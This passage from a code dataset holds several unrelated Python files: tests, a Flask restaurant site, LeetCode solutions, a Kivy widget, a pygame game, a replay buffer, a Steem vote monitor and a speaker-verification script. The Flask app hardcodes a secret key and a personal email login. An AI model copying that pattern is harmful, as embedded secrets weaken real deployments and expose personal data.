ConstantCandle(json_data={\"cache_reset\": Frequency.WEEK})\n cache = candle.get_cache_data(\n next_monday, {\"date\": now.date(), \"sample_value\": 123}\n )\n self.assertEqual(cache[\"sample_value\"], 0)\n\n def test_weekly_cache_does_not_reset(self):\n \"\"\"If same week, weekly cache does not reset.\"\"\"\n now = get_current_time()\n days = 6 - now.date().weekday() % 7\n next_sunday = now + pd.Timedelta(f\"{days}d\")\n candle = ConstantCandle(json_data={\"cache_reset\": Frequency.WEEK})\n cache = candle.get_cache_data(\n next_sunday, {\"date\": next_sunday.date(), \"sample_value\": 123}\n )\n self.assertEqual(cache[\"sample_value\"], 123)\n","sub_path":"quant_candles/tests/models/candle_types/test_constant_candles.py","file_name":"test_constant_candles.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"219772507","text":"from flask import Flask, render_template, request\n###############################################\n# Import some packages #\n###############################################\nfrom flask_mail import Mail, Message\nfrom form_contact import ContactForm, csrf\n\n\nmail = Mail()\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = \"000d88cd9d90036ebdd237eb6b0db000\"\ncsrf.init_app(app)\n\napp.config['MAIL_SERVER']='smtp.gmail.com'\napp.config['MAIL_PORT'] = 465\napp.config['MAIL_USERNAME'] = 'tonin89@gmail.com'\napp.config['MAIL_PASSWORD'] = '*****'\napp.config['MAIL_USE_TLS'] = False\napp.config['MAIL_USE_SSL'] = True\n\nmail.init_app(app)\n\n@app.route('/')\n@app.route('/index')\ndef index():\n return render_template(\"index.html\")\n\n@app.route('/o-nama')\ndef onama():\n return render_template('onama.html')\n \n@app.route('/jelovnik')\ndef jelovnik():\n return render_template('jelovnik.html')\n\n@app.route('/galerija')\ndef galerija():\n return render_template('galerija.html')\n\n###############################################\n# Render Contact page #\n###############################################\n@app.route('/kontakt', methods=['POST', 'GET'])\ndef kontakt():\n form = ContactForm()\n if form.validate_on_submit(): \n print('-------------------------')\n print(request.form['name'])\n print(request.form['email'])\n print(request.form['subject'])\n print(request.form['message']) \n print('-------------------------')\n send_message(request.form)\n return redirect('/success') \n\n return render_template('kontakt.html', form=form)\n\n@app.route('/success')\ndef success():\n return render_template('index.html')\n\ndef send_message(message):\n print(message.get('name'))\n\n msg = Message(message.get('subject'), sender = message.get('email'),\n recipients = ['id1@gmail.com'],\n body= message.get('message')\n ) \n mail.send(msg)\n\nif __name__ == '__main__':\n app.run()","sub_path":"projects/ToninPy/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"493025696","text":"from django.contrib import admin\n\nfrom sections.models import Section\n\n\n@admin.register(Section)\nclass SectionAdmin(admin.ModelAdmin):\n def get_queryset(self, request):\n qs = super(SectionAdmin, self).get_queryset(request)\n qs = qs.select_related('parent')\n return qs\n\n list_display = ['name', 'order', 'parent']\n search_fields = ['name']\n","sub_path":"sections/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"532906034","text":"class Solution(object):\n def findWords(self, words):\n \"\"\"\n :type words: List[str]\n :rtype: List[str]\n \"\"\"\n first_row = ['q', 'w', 'e','r','t','y','u','i','o','p']\n second_row = ['a', 's', 'd','f','g','h','j','k','l']\n third_row = ['z', 'x', 'c','v','b','n','m']\n \n def get_word_score(word):\n score = [0, 0, 0]\n for c in word:\n if c in first_row:\n score[0] += 1\n elif c in second_row:\n score[1] += 1\n elif c in third_row:\n score[2] += 1\n return score\n res = []\n for word in words:\n original_word = word\n word = word.lower()\n score = get_word_score(word)\n if sum(score) == max(score):\n res.append(original_word)\n return res\n \n ","sub_path":"Solutions/Q500_keyboard_row.py","file_name":"Q500_keyboard_row.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"226555940","text":"from kivy.properties import StringProperty,BooleanProperty,NumericProperty,OptionProperty,ObjectProperty\nfrom kivy.logger import Logger\nfrom kivy.app import App\nfrom datetime import datetime\nfrom timezonefinder import TimezoneFinder\nfrom pytz import timezone\n\n# Custom imports\nfrom widgets.basewidget import ScatterBase\n\n\nclass TimeWidget(ScatterBase):\n\n # Properties that are changed in settings\n type = StringProperty('Time')\n name = StringProperty('Time')\n autotime = BooleanProperty(False)\n city_id = NumericProperty(5128638)\n date_format = NumericProperty(1)\n enable_military = BooleanProperty(False)\n enable_seconds = BooleanProperty(True)\n enable_location = BooleanProperty(False)\n\n # Kivy properties that are not to be touched\n second = StringProperty('0')\n minute = StringProperty('0')\n hour = StringProperty('0')\n day = StringProperty('0')\n month = StringProperty('0')\n year = StringProperty('0')\n location = StringProperty('Earth')\n day_of_week = StringProperty('0')\n timezone = ObjectProperty()\n update_interval = NumericProperty(1)\n\n # Blocks\n seconds_block = ObjectProperty()\n date_block = ObjectProperty()\n location_block = ObjectProperty()\n\n def initialize(self, *args):\n app = App.get_running_app()\n Logger.info('Initializing widget {}'.format(self.name))\n\n # 1. Remove blocks based on user settings\n if not self.enable_seconds:\n self.remove_widget(self.seconds_block)\n if self.date_format == 0:\n self.remove_widget(self.date_block)\n if not self.enable_location:\n self.remove_widget(self.location_block)\n\n # 2. get location from city_id\n current_city = list(filter(lambda city: city['id'] == self.city_id, app.city_list))[0]\n self.location = current_city['name']+', '+current_city['country']\n\n #3. get local time from coords\n lat = current_city['coord']['lat']\n lon = current_city['coord']['lon']\n timezone_str = TimezoneFinder().timezone_at(lat=lat,lng=lon)\n if timezone_str is None:\n Logger.critical('No valid timezone found for widget!')\n timezone_str = 'America/Los_Angeles'\n self.timezone = timezone(timezone_str)\n\n # 3. Immediately update to current time\n self.update()\n\n def get_date(self,id):\n id = int(id)\n\n utc_time = datetime.utcnow()\n current = utc_time + self.timezone.utcoffset(datetime.utcnow())\n self.date_num = current.strftime('%x')\n self.year = current.strftime(\"%Y\")\n self.month = current.strftime(\"%B\")\n self.month_abbr = current.strftime('%b')\n self.weekday = current.strftime(\"%A\")\n self.weekday_abbr = current.strftime('%a')\n self.day = current.strftime(\"%d\")\n\n if id==0: return 'None'\n if id==1: return '{}, {} {}, {}'.format(self.weekday,self.month,self.day,self.year)\n if id==2: return '{} {}'.format(self.month,self.day)\n if id==3: return '{} {}'.format(self.month_abbr,self.day)\n if id==4: return '{} {}, {}'.format(self.month,self.day,self.year)\n if id==5: return '{}, {} {}'.format(self.weekday,self.month,self.day)\n if id==6: return '{}, {} {}'.format(self.weekday_abbr,self.month,self.day)\n if id==7: return '{}, {} {}'.format(self.weekday_abbr,self.month_abbr,self.day)\n if id==8: return '{}'.format(self.weekday)\n if id==9: return '{}'.format(self.date_num)\n\n return False\n\n def update_time(self,*args):\n utc_time = datetime.utcnow()\n current = utc_time + self.timezone.utcoffset(datetime.utcnow())\n\n self.hour = current.strftime(\"%H\") if self.enable_military else current.strftime(\"%I\")\n self.second = current.strftime('%S')\n self.minute = current.strftime('%M')\n\n def update(self,*args):\n Logger.info('Updating widget {}'.format(self.name))\n\n #1. Get date info\n if self.date_format != 0:\n self.date_block.text = self.get_date(self.date_format)\n\n #2. Get time\n self.update_time()\n","sub_path":"widgets/timewidget.py","file_name":"timewidget.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"92258865","text":"import binascii\nimport sys\n\nfrom col_types import types\n\n\n# Gets field type belonging to column, and also returns the length in bytes of the column\ndef get_col_type(file, offset):\n # field type is located 164 bytes after first byte describing column\n file.seek(offset + 164)\n byte = file.read(1)\n try:\n\n col_type = types[byte]['col_type']\n # add 1 to col length to compensate for starting \\x01 byte\n col_length = types[byte]['col_length']+1\n except:\n print('Unknown field type, can\\'t extract data (yet)')\n sys.exit(1)\n\n if col_type == 'string':\n # string field length is located 2 bytes after field type\n file.seek(offset + 166)\n byte = file.read(1)\n # Add two bytes for starting \\x01 and ending \\x00\n col_length = int(binascii.hexlify(byte), 16)+2\n\n return col_type, col_length\n\n\n# Creates a dict containing column name, length and field type\ndef get_col(file, offset, next_byte):\n col = {}\n\n num_cols = 0\n file.seek(offset)\n byte = file.read(1)\n # print(byte)\n # print(next_byte.encode())\n if byte == next_byte:\n print('found')\n num_cols += 1\n else:\n return '__DONE__'\n next = offset+2\n\n buf = ''\n # file.seek(next)\n # byte = file.read(1)\n\n # Get col type\n col['type'], col['length'] = get_col_type(file, offset)\n # print(col['type'], col['length'])\n\n # Get col name\n while(True):\n # When we reach \\x00, we've reached the end of the title.\n if(byte == b'\\x00'):\n break\n # print('read: ' + binascii.hexlify(file.read(1)))\n file.seek(next)\n byte = file.read(1)\n buf += byte.decode()\n # print(byte)\n next += 1\n # Strip beginning \\x01 and ending \\x00\n col['name'] = buf[1:-1]\n\n return col\n\n\n# Creates a list of all columns\ndef get_col_names(file):\n # SET values to find first col\n done = False\n offset = 512 # first col has offset 0x200\n nxt = 1\n\n cols = []\n\n # GET cols\n while(not done):\n next_byte = chr(nxt).encode()\n\n col = get_col(file, offset, next_byte)\n\n if col != '__DONE__':\n cols.append(col)\n nxt += 1\n else:\n done = True\n last_offset = offset\n\n offset += 768 # next col has offset += 0x300\n\n # print(cols)\n return cols, last_offset\n","sub_path":"python3/columns.py","file_name":"columns.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"325136001","text":"# google snapchat\n'''\nGiven an integer matrix, find the length of the longest increasing path.\n\nFrom each cell, you can either move to four directions: left, right, up or down. You may NOT move diagonally or move outside of the boundary (i.e. wrap-around is not allowed).\n\nExample 1:\n\nInput: nums =\n[\n [9,9,4],\n [6,6,8],\n [2,1,1]\n]\nOutput: 4\nExplanation: The longest increasing path is [1, 2, 6, 9].\nExample 2:\n\nInput: nums =\n[\n [3,4,5],\n [3,2,6],\n [2,2,1]\n]\nOutput: 4\nExplanation: The longest increasing path is [3, 4, 5, 6]. Moving diagonally is not allowed.\n'''\nclass Solution:\n def longestIncreasingPath(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: int\n \"\"\"\n if not matrix or not matrix[0]: return 0\n R, C = len(matrix), len(matrix[0])\n def neighbors(r, c):\n for dr, dc in [[-1, 0], [1, 0], [0, -1], [0, 1]]:\n r0, c0 = dr + r, dc + c\n if 0 <= r0 < R and 0 <= c0 < C:\n yield (r0, c0)\n\n def search(r, c):\n if (r, c) not in mem:\n path = 0\n for r0, c0 in neighbors(r, c):\n if matrix[r0][c0] > matrix[r][c]:\n path = max(path, search(r0, c0))\n mem[r, c] = path + 1\n return mem[r, c]\n\n mem = dict()\n res = 0\n for i in range(R):\n for j in range(C):\n res = max(res, search(i, j))\n return res\n\ns = Solution()\nprint(s.longestIncreasingPath([\n [3,4,5],\n [3,2,6],\n [2,2,1]\n])) #4\nprint(s.longestIncreasingPath([\n [9,9,4],\n [6,6,8],\n [2,1,1]\n])) #4\n","sub_path":"leetcode/longestIncreasingPathInAMatrix/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"19160764","text":"import pygame as pg\nimport new_classes\nimport menu\n\npg.init()\nmenu.init({'buttons':pg.font.SysFont('dejavuserif',40),'title':pg.font.SysFont('lato',60),'header':pg.font.SysFont('lato',30),'text':pg.font.SysFont('dejavuserif',20)})\n\n#clock\nclock = pg.time.Clock()\n\n#music\npg.mixer.music.load('mus.wav')\npg.mixer.music.play(-1) #setting it to negative ones mean play infinitly, other numbers just mean play x amount of times\n\n#screen\nSCREEN_WIDTH = 400\nSCREEN_HEIGHT = 400\nwin = pg.display.set_mode((SCREEN_WIDTH,SCREEN_HEIGHT))\npg.display.set_caption('Lights Out')\n\n#player\nplayer = new_classes.Player([0,0],20,40)\nplayer.set_surf(win)\njumping = False\ncanjump = True\njump_max = 100\njump_height = 0\nairTimeList = [0,20] # current , max\ntouchingPlatform = False\ntouchingWall = False\n\n# Lantern\n#lantern = new_classes.Lantern(win,player,[0,0])\n\n# Sprite groups\nallSprites = pg.sprite.Group()\nallSprites.add(player)\n#allSprites.add(lantern)\n\nplatforms = pg.sprite.Group()\nenemies = pg.sprite.Group()\nhfloats = pg.sprite.Group()\nvfloats = pg.sprite.Group()\n\n# Ground\nground = [new_classes.Ground(win,'dungeon',[0,350],200), new_classes.Ground(win,'dungeon',[300,350],200)]\nallSprites.add(ground[0])\nallSprites.add(ground[1])\n\n# platform\nMOVE_RATE = 1\nbrain = new_classes.PlatformBrain()\n\nplatformCoords = [[400, 275]]\nallPlatForms = [new_classes.Ground(win,'dungeon',platformCoords[0],50)]\nallSprites.add(allPlatForms[0])\nplatforms.add(allPlatForms[0])\n\n# Wall\nwall = [new_classes.Wall(win,'dungeon',[150,250],100)]\nallSprites.add(wall[0])\nplatforms.add(wall)\n\n#main menu\ndone = menu.start(win)\n\n#game\nwhile not done:\n #fill screen with black\n win.fill((0,0,0))\n \n for event in pg.event.get():\n if event.type == pg.QUIT:\n done = True\n ''' \n # Checks if touching ground\n # Go through all Ground new_classes and sees if they collide with the player.\n isTouchingGround = False\n for i in range(0, len(ground)):\n if ground[i].touchingGround(player.coords):\n touchingPlatform = True\n canJump = True\n isTouchingGround = True\n # Once we touch one ground we can not touch any other ground so we break\n break\n else:\n touchingPlatform = False\n\n # Checks if touching platforms if we are not touching ground\n if not isTouchingGround:\n counter = 0\n # 20 is for the player Height\n playX = player.coords[0]\n playY = player.coords[1] + 20\n for i in range(0, len(platformCoords)):\n # 50 is the platform Width\n # 5 is the margin where the player can stay on the platform\n xRange = playX + 20 >= platformCoords[i][0] and playX <= platformCoords[i][0] + 50\n yRange = playY <= platformCoords[i][1] and playY >= platformCoords[i][1] - 5\n counter += 1\n if xRange and yRange:\n touchingPlatform = True\n canjump = True\n break\n else:\n touchingPlatform = False\n\n # 0 is touching the left side and 1 is touching the right side\n isTouchingWall = [False, False]\n # Checks if touching a wall\n for i in range(0, len(wall)):\n # If the player is ontop of the wall\n if wall[i].onTopWall(player.coords):\n touchingPlatform = True\n canJump = True\n break\n # If the player is next to the wall\n isTouchingWall = wall[i].onSideWall(player.coords)\n if isTouchingWall[0] or isTouchingWall[1]:\n break'''\n\n \n # I moved this chunk of code to have the touchingWall variable easier to access\n #key presses\n pressed = pg.key.get_pressed()\n x,y = 0,0\n if pressed[pg.K_SPACE] and (not jumping and player.touchingGround or player.touchingWall):\n player.jumping = True\n if pressed[pg.K_a] and not player.touchingWall:\n x -= 5\n if pressed[pg.K_d] and not player.touchingWall:\n x += 5\n if player.jumping:\n if jump_height >= jump_max:\n player.jumping = False\n jump_height = 0\n else:\n y -= 20\n jump_height += 10\n \n #airtime / coyote time\n if not touchingPlatform and not jumping:\n if airTimeList[0] <= airTimeList[1]:\n airTimeList[0] += 1\n else: y += 10\n \n # Checks if player fell to death\n '''if player.rect.bottom >= 400:\n player.respawn([0,0])'''\n \n #format list for player collision\n collidables = [allPlatForms[i] for i in range(0,len(allPlatForms))]\n for i in range(0,len(ground)):\n collidables.append(ground[i])\n for i in range(0,len(wall)):\n collidables.append(wall[i])\n \n player.move(collidables,x,y)\n #lantern.move()\n \n # Moves platforms\n for i in range(0, len(platformCoords)):\n platformCoords[i][0] -= MOVE_RATE\n allPlatForms[i].move(MOVE_RATE,0)\n\n # Check if we should make a new platform with brain if so make one\n if brain.shouldPlatformBeCreated(platformCoords):\n # Here we get the new positions for the platform\n lastPlatform = platformCoords[len(platformCoords) - 1]\n positions = brain.getNewPlatformPosition(lastPlatform)\n # We add the new platform to the coordinates and platformClass\n platformCoords.append(positions)\n allPlatForms.append(new_classes.Platform(win, positions, 50))\n\n index = len(platformCoords) - 1\n # Here we add them to the sprite\n allSprites.add(allPlatForms[index])\n platforms.add(allPlatForms[index])\n\n #draw stuffs\n for entity in allSprites:\n entity.render()\n \n #update screen\n pg.display.flip()\n clock.tick(60)\n\npg.quit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"335047888","text":"# -*- coding: utf-8 -*-\n\"\"\"Wrappers for buffer.\n\n- Author: Kyunghwan Kim & Euijin Jeong\n- Contact: kh.kim@medipixel.io & euijin.jeong@medipixel.io\n- Paper: https://arxiv.org/pdf/1511.05952.pdf\n https://arxiv.org/pdf/1707.08817.pdf\n\"\"\"\n\nimport random\nfrom typing import Any, Tuple\n\nimport numpy as np\nimport torch\n\nfrom rl_algorithms.common.abstract.buffer import BaseBuffer, BufferWrapper\nfrom rl_algorithms.common.buffer.segment_tree import MinSegmentTree, SumSegmentTree\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n\nclass PrioritizedBufferWrapper(BufferWrapper):\n \"\"\"Prioritized Experience Replay wrapper for Buffer.\n\n\n Refer to OpenAI baselines github repository:\n https://github.com/openai/baselines/blob/master/baselines/deepq/replay_buffer.py\n\n Attributes:\n buffer (Buffer): Hold replay buffer as an attribute\n alpha (float): alpha parameter for prioritized replay buffer\n epsilon_d (float): small positive constants to add to the priorities\n tree_idx (int): next index of tree\n sum_tree (SumSegmentTree): sum tree for prior\n min_tree (MinSegmentTree): min tree for min prior to get max weight\n _max_priority (float): max priority\n \"\"\"\n\n def __init__(\n self, base_buffer: BaseBuffer, alpha: float = 0.6, epsilon_d: float = 1.0\n ):\n \"\"\"Initialize.\n\n Args:\n base_buffer (Buffer): ReplayBuffer which should be hold\n alpha (float): alpha parameter for prioritized replay buffer\n epsilon_d (float): small positive constants to add to the priorities\n\n \"\"\"\n BufferWrapper.__init__(self, base_buffer)\n assert alpha >= 0\n self.alpha = alpha\n self.epsilon_d = epsilon_d\n self.tree_idx = 0\n\n # capacity must be positive and a power of 2.\n tree_capacity = 1\n while tree_capacity < self.buffer.max_len:\n tree_capacity *= 2\n\n self.sum_tree = SumSegmentTree(tree_capacity)\n self.min_tree = MinSegmentTree(tree_capacity)\n self._max_priority = 1.0\n\n # for init priority of demo\n self.tree_idx = self.buffer.demo_size\n for i in range(self.buffer.demo_size):\n self.sum_tree[i] = self._max_priority ** self.alpha\n self.min_tree[i] = self._max_priority ** self.alpha\n\n def add(\n self, transition: Tuple[np.ndarray, np.ndarray, float, np.ndarray, bool]\n ) -> Tuple[Any, ...]:\n \"\"\"Add experience and priority.\"\"\"\n n_step_transition = self.buffer.add(transition)\n if n_step_transition:\n self.sum_tree[self.tree_idx] = self._max_priority ** self.alpha\n self.min_tree[self.tree_idx] = self._max_priority ** self.alpha\n\n self.tree_idx += 1\n if self.tree_idx % self.buffer.max_len == 0:\n self.tree_idx = self.buffer.demo_size\n\n return n_step_transition\n\n def _sample_proportional(self, batch_size: int) -> list:\n \"\"\"Sample indices based on proportional.\"\"\"\n indices = []\n p_total = self.sum_tree.sum(0, len(self.buffer) - 1)\n segment = p_total / batch_size\n\n for i in range(batch_size):\n a = segment * i\n b = segment * (i + 1)\n upperbound = random.uniform(a, b)\n idx = self.sum_tree.retrieve(upperbound)\n indices.append(idx)\n return indices\n\n def sample(self, beta: float = 0.4) -> Tuple[torch.Tensor, ...]:\n \"\"\"Sample a batch of experiences.\"\"\"\n assert len(self.buffer) >= self.buffer.batch_size\n assert beta > 0\n\n indices = self._sample_proportional(self.buffer.batch_size)\n\n # get max weight\n p_min = self.min_tree.min() / self.sum_tree.sum()\n max_weight = (p_min * len(self.buffer)) ** (-beta)\n\n # calculate weights\n weights_, eps_d = [], []\n for i in indices:\n eps_d.append(self.epsilon_d if i < self.buffer.demo_size else 0.0)\n p_sample = self.sum_tree[i] / self.sum_tree.sum()\n weight = (p_sample * len(self.buffer)) ** (-beta)\n weights_.append(weight / max_weight)\n\n weights = np.array(weights_)\n eps_d = np.array(eps_d)\n\n weights = weights.reshape(-1, 1)\n\n states, actions, rewards, next_states, dones = self.buffer.sample(indices)\n\n return states, actions, rewards, next_states, dones, weights, indices, eps_d\n\n def update_priorities(self, indices: list, priorities: np.ndarray):\n \"\"\"Update priorities of sampled transitions.\"\"\"\n assert len(indices) == len(priorities)\n\n for idx, priority in zip(indices, priorities):\n assert priority > 0\n assert 0 <= idx < len(self.buffer)\n\n self.sum_tree[idx] = priority ** self.alpha\n self.min_tree[idx] = priority ** self.alpha\n\n self._max_priority = max(self._max_priority, priority)\n","sub_path":"rl_algorithms/common/buffer/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"14372099","text":"#!/usr/bin/python3\n\n# The __main__ function included with jsonrpc.py. Has not been ported to Python 3.\n\nimport sys\nimport dateutil.parser\nfrom datetime import datetime as dt\nfrom twisted.internet import reactor\nfrom twisted.logger import Logger, textFileLogObserver\nfrom asyncsteem import RpcClient\n\n#When processing a block we call this function for each downvote/flag\ndef process_vote(vote_event,clnt):\n #Create a new JSON-RPC entry on the queue to fetch post info, including detailed vote info\n opp = clnt.get_content(vote_event[\"author\"],vote_event[\"permlink\"])\n #This one is for processing the results from get_content\n def process_content(event, client):\n #We geep track of votes given and the total rshares this resulted in.\n start_rshares = 0.0\n #Itterate over all votes to count rshares and to find the downvote we are interested in.\n found = False\n for vote in event[\"active_votes\"]:\n #Look if it is our downvote.\n if vote[\"voter\"] == vote_event[\"voter\"] and vote[\"rshares\"] < 0:\n found = True\n #Diferentiate between attenuating downvotes and reputation eating flags.\n if start_rshares + float(vote[\"rshares\"]) < 0:\n print(vote[\"time\"],\\\n \"FLAG\",\\\n vote[\"voter\"],\"=>\",vote_event[\"author\"],\\\n vote[\"rshares\"],\" rshares (\",\\\n start_rshares , \"->\", start_rshares + float(vote[\"rshares\"]) , \")\")\n else:\n print(vote[\"time\"],\\\n \"DOWNVOTE\",\\\n vote[\"voter\"],\"=>\",vote_event[\"author\"],\\\n vote[\"rshares\"],\"(\",\\\n start_rshares , \"->\" , start_rshares + float(vote[\"rshares\"]) , \")\")\n #Update the total rshares recorded before our downvote\n start_rshares = start_rshares + float(vote[\"rshares\"])\n if found == False:\n print(\"vote not found, possibly to old.\",vote_event[\"voter\"],\"=>\",vote_event[\"author\"],vote_event[\"permlink\"])\n #Set the above closure as callback.\n opp.on_result(process_content)\n#This is a bit fiddly at this low level, start nextblock a bit higer than where we start out\nnextblock = 19933100\nobs = textFileLogObserver(sys.stdout)\nlog = Logger(observer=obs,namespace=\"jsonrpc_test\")\n#Create our JSON-RPC RpcClient\nrpcclient = RpcClient(reactor,log)\n#Count the number of active block queries\nactive_block_queries = 0\nsync_block = None\n#Function for fetching a block and its operations.\ndef get_block(blk):\n \"\"\"Request a single block asynchonously.\"\"\"\n global active_block_queries\n #This one is for processing the results from get_block\n def process_block(event, client):\n \"\"\"Process the result from block getting request.\"\"\"\n global active_block_queries\n global nextblock\n global sync_block\n active_block_queries = active_block_queries - 1\n if event != None:\n if sync_block != None and blk >= sync_block:\n sync_block = None\n #Itterate over all operations in the block.\n for t in event[\"transactions\"]:\n for o in t[\"operations\"]:\n #We are only interested in downvotes\n if o[0] == \"vote\" and o[1][\"weight\"] < 0:\n #Call process_vote for each downvote\n process_vote(o[1],client)\n #fetching network clients alive.\n get_block(nextblock)\n nextblock = nextblock + 1\n if active_block_queries < 8:\n treshold = active_block_queries * 20\n behind = (dt.utcnow() - dateutil.parser.parse(event[\"timestamp\"])).seconds\n if behind >= treshold:\n print(\"Behind\",behind,\"seconds while\",active_block_queries,\"queries active. Treshold =\",treshold)\n print(\"Spinning up an extra parallel query loop.\")\n get_block(nextblock)\n nextblock = nextblock + 1\n else:\n if sync_block == None or blk <= sync_block:\n sync_block = blk\n get_block(blk)\n else:\n print(\"Overshot sync_block\")\n if active_block_queries == 0:\n print(\"Keeping one loop alive\")\n get_block(blk)\n else:\n print(\"Scaling down paralel HTTPS queries\",active_block_queries)\n #Create a new JSON-RPC entry on the queue to fetch a block.\n opp = rpcclient.get_block(blk)\n active_block_queries = active_block_queries + 1\n #Bind the above closure to the result of get_block\n opp.on_result(process_block)\n#Kickstart the process by kicking off eigth block fetching operations.\nfor block in range(19933000, 19933100):\n get_block(block)\n#By invoking the rpcclient, we will process queue entries upto the max number of paralel HTTPS requests.\nrpcclient()\n#Start the main twisted event loop.\nreactor.run()\n","sub_path":"examples/jsonrpc_main.py","file_name":"jsonrpc_main.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"608349379","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom utils import *\nfrom network import *\n\n\n# In[2]:\n\ndef test(opt):\n TEST_PAIRS_FILE = opt.pairs\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n print(device)\n\n\n # In[3]:\n\n\n weights = load_pretrained_weights()\n\n\n # In[12]:\n\n\n# voxceleb_dataset = VoxCelebDataset(PAIRS_FILE, test_users = ['f0001','m0001'])#PAIRS_FILE\n# # train_dataloader = DataLoader(voxceleb_dataset, batch_size=BATCH_SIZE, shuffle=True, \n# # num_workers=4)\n# n_batches = int(len(voxceleb_dataset) / BATCH_SIZE)\n\n# print(\"training unique users\", len(voxceleb_dataset.training_users))\n# print(\"training samples\", len(voxceleb_dataset))\n# print(\"batches\", int(len(voxceleb_dataset) / BATCH_SIZE))\n\n\n # In[ ]:\n\n\n\n\n\n # In[13]:\n\n\n checkpoints = os.listdir(get_rel_path('checkpoints/'))\n# print(\"\\n\".join(checkpoints))\n checkpoints.sort()\n print(checkpoints[-1])\n\n # In[14]:\n\n\n test_model ,_, _ = load_saved_model(checkpoints[-1], test=True)\n\n\n # ### for each user ID get mean embedding \n\n # In[15]:\n\n\n class VoxCelebTestDataset(Dataset):\n\n def __init__(self, pairs_fname, users=None, n_users=5, clips_per_user=5):\n if users:\n pairs_file = pd.read_csv(get_rel_path(pairs_fname)) \n user_subset = pairs_file[pairs_file.user1.isin(users)]\n self.users = user_subset.user1.unique()\n self.spec = user_subset[user_subset.user1.isin(self.users)] \n self.spec = self.spec.drop_duplicates(subset = ['path1'])[['user1', 'path1']].values \n else:\n pairs_file = pd.read_csv(get_rel_path(pairs_fname)) \n user_subset = pairs_file \n self.users = pairs_file.user1.unique()\n self.spec = user_subset[user_subset.user1.isin(self.users)] \n self.spec = self.spec.drop_duplicates(subset = ['path1'])[['user1', 'path1']].values \n\n def __len__(self):\n return len(self.spec)\n\n def __getitem__(self, idx):\n spec1_path = get_rel_path(self.spec[idx][1])\n user_id = self.spec[idx][0]\n spec1 = np.load(spec1_path) \n sample = {'spec': spec1, 'user_id': user_id}\n\n return sample\n\n\n # In[16]:\n\n\n test_batch_size = 1\n# training_users = voxceleb_dataset.training_users\n# total_users = voxceleb_dataset.all_user_ids\n# test_users = [i for i in total_users if i not in training_users]\n\n\n # In[17]:\n\n\n# voxceleb_train_dataset = VoxCelebTestDataset(PAIRS_FILE, training_users, clips_per_user=NUM_NEW_CLIPS, n_users=20)\n voxceleb_total_dataset = VoxCelebTestDataset(PAIRS_FILE, clips_per_user=NUM_NEW_CLIPS, n_users=20) #, total_users\n voxceleb_test_dataset = VoxCelebTestDataset(TEST_PAIRS_FILE, clips_per_user=NUM_NEW_CLIPS, n_users=20)#, test_users\n\n\n # train_dataloader = DataLoader(voxceleb_train_dataset, \n # batch_size=test_batch_size, \n # shuffle=False, \n # num_workers=1)\n\n# print(len(voxceleb_train_dataset), \"training samples\")\n# print(len(voxceleb_train_dataset.users))\n\n\n # In[18]:\n\n\n def get_user_model(dataset):\n user_dict = OrderedDict()\n\n for i, data in enumerate(dataset):\n spec, user_id = data['spec'], data['user_id']\n spec = torch.tensor(spec)\n spec = spec.view(test_batch_size, 1, spec.shape[0], spec.shape[1])\n spec = spec.to(device)\n out = test_model.forward_single(spec)\n out = out.view(out.shape[0], out.shape[1])\n\n if user_dict.get(user_id, None) is not None:\n user_dict[user_id].append(out.detach().cpu().numpy())\n\n else:\n user_dict[user_id] = [out.detach().cpu().numpy()]\n\n# print(\"total :\", i+1)\n mean_dict = {}\n for user_id, emb_list in user_dict.items():\n emb_list = np.array(emb_list)\n mean_emb = np.mean(emb_list, axis = 0)\n mean_dict[user_id] = mean_emb\n\n return user_dict, mean_dict\n\n\n # In[19]:\n\n\n# train_user_embeddings ,train_mean_dict = get_user_model(voxceleb_train_dataset)\n\n\n\n\n # In[21]:\n\n\n total_user_embeddings ,total_mean_dict = get_user_model(voxceleb_total_dataset)\n\n\n # In[22]:\n\n\n test_user_embeddings ,test_mean_dict = get_user_model(voxceleb_total_dataset)\n\n\n\n threshold = opt.threshold\n correct, incorrect = 0, 0\n user_label = {}\n k=0\n mean_data = []\n for user in total_mean_dict:\n user_label[user]=k\n mean_data.append(total_mean_dict[user])\n k+=1\n mean_data = np.vstack(mean_data)\n distances_to_truth = {}\n for user in test_user_embeddings:\n user_emb_i = np.vstack(test_user_embeddings[user])\n users_cosine_similarity = cosine_similarity(user_emb_i, mean_data)\n distances_to_truth[user] = users_cosine_similarity[:,user_label[user]]\n pred = np.argmax(users_cosine_similarity, axis=1)\n correct_i = (pred==user_label[user]).sum()\n correct += correct_i\n incorrect += (user_emb_i.shape[0] - correct_i)\n\n acc = correct / (correct + incorrect) \n GT_distances = np.vstack(list(distances_to_truth.values())).flatten()\n veri = np.sum(GT_distances>threshold)/len(GT_distances)#GroundTruth\n\n print(f'num of correct: 